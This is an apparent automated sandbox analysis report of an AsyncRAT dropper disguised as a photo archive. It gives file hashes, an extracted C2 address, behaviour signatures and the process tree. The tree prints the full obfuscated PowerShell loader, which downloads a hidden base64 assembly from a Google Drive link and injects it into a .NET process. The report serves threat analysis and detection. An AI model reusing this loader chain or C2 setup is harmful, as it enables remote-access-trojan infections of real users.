Analysis
-
max time kernel
69s -
max time network
92s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 01:56
Static task
static1
Behavioral task
behavioral1
Sample
Lana_Rhoades_Photoos.zip
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Lana_Rhoades_Photoos.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
'''.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
'''.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Lana_Rhoades_Photoos.js
Resource
win7-20240903-en
General
-
Target
Lana_Rhoades_Photoos.js
-
Size
548KB
-
MD5
ae498935d8a61b3008bd9393a2306dec
-
SHA1
b1858655d705e14c01cec8d008c3f3db0a09807b
-
SHA256
401f183d5553d4f01ff3a4df33524f39faa6138f40afb570300ae41ca31efc08
-
SHA512
8d9830e5ff3f09099ac1e1af2a585cad2a2ad287b75117741d5f940dc2dd934e7046d17881c93b0398917d1f42a9208ab17bede62a594b1a12997d2bba660a8b
-
SSDEEP
3072:0F8F8F8F8F8F8F8F8F8F8F8F8F8FjFoFoFoFoFoFoFoFoFoFoFoFoFoFoFoFoFod:X7HlvYPobr777lvrFI
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Extracted
asyncrat
1.0.7
CEZER
148.113.165.11:3236
eqwe2131ewqeqwe
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 5 IoCs
Processes:
wscript.exepowershell.exeflow pid process 4 1004 wscript.exe 7 1004 wscript.exe 24 4988 powershell.exe 26 4988 powershell.exe 32 4988 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1924 powershell.exe 4988 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4988 set thread context of 2256 4988 powershell.exe AddInProcess32.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
AddInProcess32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1924 powershell.exe 1924 powershell.exe 4988 powershell.exe 4988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeAddInProcess32.exedescription pid process Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 2256 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
wscript.exepowershell.exepowershell.exedescription pid process target process PID 1004 wrote to memory of 1924 1004 wscript.exe powershell.exe PID 1004 wrote to memory of 1924 1004 wscript.exe powershell.exe PID 1924 wrote to memory of 4988 1924 powershell.exe powershell.exe PID 1924 wrote to memory of 4988 1924 powershell.exe powershell.exe PID 4988 wrote to memory of 2256 4988 powershell.exe AddInProcess32.exe PID 4988 wrote to memory of 2256 4988 powershell.exe AddInProcess32.exe PID 4988 wrote to memory of 2256 4988 powershell.exe AddInProcess32.exe PID 4988 wrote to memory of 2256 4988 powershell.exe AddInProcess32.exe PID 4988 wrote to memory of 2256 4988 powershell.exe AddInProcess32.exe PID 4988 wrote to memory of 2256 4988 powershell.exe AddInProcess32.exe PID 4988 wrote to memory of 2256 4988 powershell.exe AddInProcess32.exe PID 4988 wrote to memory of 2256 4988 powershell.exe AddInProcess32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Lana_Rhoades_Photoos.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAJwArACcAaABCAFkAdwB1AHIAIABaADQAUwA7AFQAMgBIAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgACcAKwAnAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQAnACsAJwBuAHQAOwBUADIASABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAMgAnACsAJwBIAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUADIASABpAG0AYQBnAGUAVQByAGwAKQA7AFQAMgBIAGkAbQBhACcAKwAnAGcAZQBUAGUAeAAnACsAJwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAFQAMgBIAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAMgBIAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAFMAJwArACcAVABBAFIAVAA+AD4AWgA0AFMAOwAnACsAJwBUADIASABlAG4AZABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBaACcAKwAnADQAJwArACcAUwA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVAAyAEgAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVAAyAEgAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAMgBIAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABUADIASABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkACcAKwAnAGUAeABPAGYAKABUADIASABlAG4AZABGAGwAYQBnACkAOwBUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFQAMgBIAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVAAyAEgAcwB0AGEAcgB0AEkAbgBkACcAKwAnAGUAeAA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAnACsAJwBUADIASABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVAAyAEgAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACcAKwAnACAAVAAyAEgAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAOwBUADIASABiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFQAMgBIAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACwAIABUADIASABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVAAyAEgAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABWAEcAcQAgAEYAbwAnACsAJwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABUADIASABfACAAfQApAFsALQAnACsAJwAxACcAKwAnAC4ALgAtACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFQAMgBIAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAJwArACcAaQBuAGcAKABUADIASABiAGEAcwBlADYANABSAGUAdgBlACcAKwAnAHIAcwBlAGQAKQA7AFQAMgBIAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAJwArACcAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAVAAyAEgAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AFQAMgBIAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACsAJwBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABaADQAUwBWAEEASQBaADQAUwApADsAVAAyAEgAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgAnACsAJwBvAGsAZQAoAFQAMgBIAG4AdQBsAGwALAAgAEAAKABaADQAUwAwAC8ANABLAHoAJwArACcAegB1AC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAWgA0AFMAJwArACcALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBaADQAJwArACcAUwAsACAAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAbwBaADQAUwAsACAAWgA0AFMAZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBaADQAUwAnACsAJwAsAFoANABTAGQAJwArACcAZQAnACsAJwBzAGEAdABpAHYAYQAnACsAJwBkAG8AWgA0AFMALABaADQAJwArACcAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALABaADQAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAMQBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMAKQApADsAJwApACAALQBDAHIAZQBQAGwAYQBDAEUAIAAgACcAVAAyAEgAJwAsAFsAQwBoAGEAUgBdADMANgAtAFIAZQBQAGwAQQBjAEUAIAAgACcAWgA0AFMAJwAsAFsAQwBoAGEAUgBdADMAOQAgAC0AQwByAGUAUABsAGEAQwBFACcAVgBHAHEAJwAsAFsAQwBoAGEAUgBdADEAMgA0ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IEX( (('T2HimageUrl = Z4Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur Z4S;T2HwebClient = '+'New-Object System.Net.WebClie'+'nt;T2HimageBytes = T2'+'HwebClient.DownloadData(T2HimageUrl);T2Hima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetSt'+'ring(T2HimageBytes);T2HstartFlag = Z4S<<BASE64_S'+'TART>>Z4S;'+'T2HendFlag = Z4S<<BASE64_END>>Z'+'4'+'S;T2HstartIndex = T2HimageText.IndexOf(T2HstartFlag);T2HendInd'+'ex = T2HimageText.Ind'+'exOf(T2HendFlag);T2HstartIndex -'+'ge 0 -and T2HendIndex -gt T2HstartInd'+'ex;T2HstartIndex += '+'T2HstartFlag.Length;T2Hbase64Length ='+' T2HendIndex - T2HstartIndex;T2Hbas'+'e64Command = T2HimageText.Substring(T2HstartIndex, T2Hbase64Length);T2Hbase64Reversed = -join (T2Hbase64Command.'+'ToCharArray() VGq Fo'+'rEach-Object { T2H_ })[-'+'1'+'..-(T2Hbase64Command.Length)];T2HcommandBytes = [System'+'.Convert]::FromBase64Str'+'ing(T2Hbase64Reve'+'rsed);T2HloadedAssembly = [System.Reflection.Asse'+'mbly]::Load(T2HcommandBytes);T2HvaiMethod = [dnlib.IO.Home'+'].GetMethod(Z4SVAIZ4S);T2HvaiMethod.Inv'+'oke(T2Hnull, @(Z4S0/4Kz'+'zu/d/ee.etsap//:sptthZ4S'+', Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SAddInProcess32Z4'+'S, Z4SdesativadoZ4S, Z4Sdesat'+'ivadoZ4S'+',Z4Sd'+'e'+'sativa'+'doZ4S,Z4'+'SdesativadoZ4S,Z4Sdesativad'+'oZ4S,Z4SdesativadoZ4S,Z4SdesativadoZ4S,Z4S1Z4S,Z4SdesativadoZ4S));') -CrePlaCE 'T2H',[ChaR]36-RePlAcE 'Z4S',[ChaR]39 -CrePlaCE'VGq',[ChaR]124))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2256
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82